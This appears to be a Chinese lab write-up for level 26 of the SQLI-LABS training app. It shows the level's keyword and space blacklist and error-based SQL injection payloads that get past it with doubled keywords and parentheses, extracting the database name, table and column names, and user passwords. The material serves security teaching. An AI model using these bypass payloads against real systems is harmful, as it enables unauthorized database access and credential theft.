SQLI-LAPS 实验记录
Less-26
这一关给出的提示信息显示对空格和注释符进行了过滤,但从源码来看,不仅是空格和注释符,还包括'or','and','/'等等,结合上一关的经验,我们保留使用双写绕过的方式,增加以 '()' 来绕过空格的方式进行注入。
php
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";根据之前我们的注入经验,并结合源码中的sql查询语句,按照提示信息,输入Payload如下:
php
1' anandd (updatexml(1,concat(0x7e,database(),0x7e),1)) anandd '1'='1
结果如图所示,可以看到页面成功返回数据库名称:security。
后续查找数据库表名、列名及其他数据的Payload分别如下:
-
查找表名:
php1' anandd (updatexml(1,(concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='security'),0x7e)),1)) anandd '1'='1
-
查找列名:
php1' anandd (updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema)='security'anandd(table_name)='users'),0x7e),1)) anandd '1'='1
查找其他数据:
1' anandd (updatexml(1,concat(0x7e,(select(concat(username,':',passwoorrd))from(security.users)where(id=1)),0x7e),1)) anandd '1'='1
这里如果想要查询其他的用户名与密码,可以修改where语句当中的id值,即id=2,3,4......